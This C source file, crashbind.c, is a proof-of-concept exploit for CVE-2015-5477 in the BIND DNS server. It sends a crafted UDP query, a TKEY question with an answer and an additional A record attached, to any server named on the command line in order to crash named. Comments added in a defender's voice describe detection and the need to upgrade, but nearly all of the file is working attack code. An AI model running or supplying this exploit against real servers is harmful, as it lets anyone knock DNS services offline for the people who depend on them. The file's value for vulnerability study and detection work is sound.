
crashbind.c

  1. // crashbind.c
  2. // CVE-2015-5477
  3. // Versions Affected: 9.1.0 -> 9.8.x, 9.9.0->9.9.7-P1, 9.10.0->9.10.2-P2
  4.  
  5. #include <stdio.h>
  6. #include <stdlib.h>
  7. #include <stdint.h>
  8. #include <unistd.h>
  9. #include <time.h>
  10. #include <errno.h>
  11. #include <string.h>
  12.  
  13. #include <netdb.h>
  14. #include <sys/types.h>
  15. #include <sys/socket.h>
  16. #include <netinet/in.h>
  17. #include <arpa/inet.h>
  18.  
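/*
 * Fixed 12-byte DNS message header as it appears on the wire.
 *
 * The 16-bit fields use uint16_t, like the other wire structs in this file,
 * so their width does not depend on the platform's `unsigned short`. They
 * hold network-byte-order values; callers convert with htons().
 *
 * The flag bit-fields are declared low bit first. That matches the wire
 * layout only when the compiler allocates bit-fields from the least
 * significant bit (as GCC does on little-endian targets); on other ABIs the
 * flags would land in the wrong positions.
 */
struct DNS_HEADER
{
    uint16_t id;                /* transaction id */

    /* first flags byte, wire order (MSB first): QR | Opcode | AA | TC | RD */
    unsigned char rd :1;
    unsigned char tc :1;
    unsigned char aa :1;
    unsigned char opcode :4;
    unsigned char qr :1;        /* 0 = query, 1 = response */

    /* second flags byte, wire order (MSB first): RA | Z | AD | CD | RCODE */
    unsigned char rcode :4;
    unsigned char cd :1;
    unsigned char ad :1;
    unsigned char z :1;
    unsigned char ra :1;

    uint16_t q_count;           /* QDCOUNT: entries in the question section */
    uint16_t ans_count;         /* ANCOUNT: records in the answer section */
    uint16_t auth_count;        /* NSCOUNT: records in the authority section */
    uint16_t add_count;         /* ARCOUNT: records in the additional section */
} __attribute__((packed));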
  40.  
/*
 * One question-section entry with a fixed 12-byte owner name.
 *
 * qname holds the name in DNS label encoding (length-prefixed labels ending
 * in a zero-length root label); 12 bytes is exactly enough for the single
 * name main() writes into it. qtype and qclass are stored in network byte
 * order.
 */
struct __attribute__((packed)) DNS_QUESTION {
    char     qname[12];
    uint16_t qtype;
    uint16_t qclass;
};
  47.  
/*
 * One resource record with a fixed 12-byte owner name and 4 bytes of RDATA.
 *
 * The same layout is used for the answer-section and the additional-section
 * record of the message. All multi-byte fields are stored in network byte
 * order. rdlength must be 4 to agree with the size of data[].
 */
struct __attribute__((packed)) DNS_ANSWER {
    char     name[12];
    uint16_t type;
    uint16_t class;
    uint32_t ttl;
    uint16_t rdlength;  /* always 4: the length of data[] below */
    uint8_t  data[4];
};
  57.  
/*
 * The complete datagram: header, one question, then two records.
 *
 * answer[0] is the answer-section record and answer[1] the
 * additional-section record; which section each belongs to is decided by
 * the counts set in the header, not by this layout. Packed so that
 * sizeof(struct mal_query) is the exact number of bytes put on the wire.
 */
struct __attribute__((packed)) mal_query
{
    struct DNS_HEADER   header;
    struct DNS_QUESTION question;
    struct DNS_ANSWER   answer[2];
};
  63.  
  64.  
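/*
 * Build one malformed DNS query and send it to argv[1] on UDP port 53.
 *
 * What defenders should recognise in the datagram: it is a query (QR=0)
 * whose question asks for type 249 (TKEY), yet it already carries one
 * answer record and one additional record for the same owner name, both of
 * type A. This is the message shape associated with CVE-2015-5477; per the
 * file header, named in the listed version ranges is affected. ISC's
 * advisory for this CVE gives no configuration workaround, so the
 * mitigation is upgrading named beyond those ranges. For detection, look
 * for inbound queries with QTYPE 249 and non-zero ANCOUNT/ARCOUNT arriving
 * from hosts that have no reason to negotiate TKEY.
 *
 * Returns EXIT_SUCCESS once the datagram has been handed to the kernel and
 * EXIT_FAILURE on a usage, resolution, socket or send error. No reply is
 * read.
 */
int
main(int argc, char **argv)
{
    int fd = -1;
    int status = EXIT_FAILURE;
    int rv;
    struct addrinfo hints;
    struct addrinfo *servinfo = NULL;
    struct mal_query mq;

    /*
     * Require an explicit target. With a NULL node and no AI_PASSIVE,
     * getaddrinfo() resolves to the loopback address, so running the tool
     * without arguments would silently hit the local name server.
     */
    if (argc < 2 || argv[1] == NULL) {
        fprintf(stderr, "usage: %s <server>\n",
                (argc > 0 && argv[0] != NULL) ? argv[0] : "crashbind");
        return EXIT_FAILURE;
    }

    /* Only used to vary the transaction id; not security relevant. */
    srand((unsigned int)time(0));

    memset(&hints, 0x0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_DGRAM;

    if ((rv = getaddrinfo(argv[1], "53", &hints, &servinfo)) != 0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(rv));
        return EXIT_FAILURE;
    }

    /* Note: only the first result is used. If the hostname has a v6 address
     * and the server isn't listening on it, the datagram goes nowhere. */
    fd = socket(servinfo->ai_family, servinfo->ai_socktype, servinfo->ai_protocol);
    if (fd < 0) {
        perror("socket");
        goto out;
    }

    /* Everything not set below (ttl, rdata, NSCOUNT, ...) stays zero. */
    memset(&mq, 0x0, sizeof(mq));

    /* Header: a standard query claiming 1 question, 1 answer, 1 additional */
    mq.header.id = htons((uint16_t)rand());
    mq.header.rd = 1;
    mq.header.opcode = 0x0;
    mq.header.qr = 0;
    mq.header.q_count = htons(1);
    mq.header.ans_count = htons(1);
    mq.header.add_count = htons(1);

    /*
     * Question. The name is label-encoded "google.com": 11 bytes plus the
     * NUL that strcpy() appends, which doubles as the root label and fills
     * the 12-byte field exactly. 'c' is spelled \x63 because "\x03c" would
     * be parsed as the single hex escape 0x3c.
     */
    strcpy(mq.question.qname, "\x06google\x03\x63om");
    mq.question.qtype = htons(249);     /* TKEY */
    mq.question.qclass = htons(0x1);    /* IN */

    /* Answer section: A/IN record for the same name, 4 zero bytes of RDATA */
    strcpy(mq.answer[0].name, "\x06google\x03\x63om");
    mq.answer[0].type = htons(0x0001);
    mq.answer[0].class = htons(0x0001);
    mq.answer[0].rdlength = htons(4);

    /* Additional section: same owner name, again a non-TKEY (A) record */
    strcpy(mq.answer[1].name, "\x06google\x03\x63om");
    mq.answer[1].type = htons(0x0001);
    mq.answer[1].class = htons(0x0001);
    mq.answer[1].rdlength = htons(4);

    if (sendto(fd, &mq, sizeof(mq), 0, servinfo->ai_addr, servinfo->ai_addrlen) < 0) {
        perror("sendto");
        goto out;
    }

    status = EXIT_SUCCESS;

out:
    /* Release the socket and the resolver results on every path. */
    if (fd >= 0) {
        close(fd);
    }
    freeaddrinfo(servinfo);

    return status;
}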